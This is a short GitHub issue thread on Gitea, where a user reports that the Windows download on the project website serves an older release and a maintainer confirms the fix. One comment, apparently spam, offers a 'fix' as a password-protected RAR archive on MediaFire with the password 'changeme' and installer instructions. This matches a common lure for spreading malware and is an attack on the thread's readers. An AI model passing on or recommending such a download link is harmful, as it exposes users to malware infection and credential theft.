### ISSUE TITLE
Main web site points Windows download to older binary

### ISSUE THREAD

**Issue by jsreynolds** [go-gitea/gitea#31926]
### Description

The main download for the Windows/Intel downloads an older version of Gitea.

https://blog.gitea.com/release-of-1.22.1/

https://about.gitea.com/products/gitea/

### Screenshots

This is what was downloaded
![image](https://github.com/user-attachments/assets/7470d8be-5f67-4f37-9b89-635b1420509e)
Gitea 1.22.1 is the current version.

### Gitea Version

1.22.1

### Can you reproduce the bug on the Gitea demo site?

Yes

### Browser Version

Chrome latest

**Comment by yp05327** [comment]
@lunny

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by lunny** [comment]
Thank you for your report. It has been fixed.
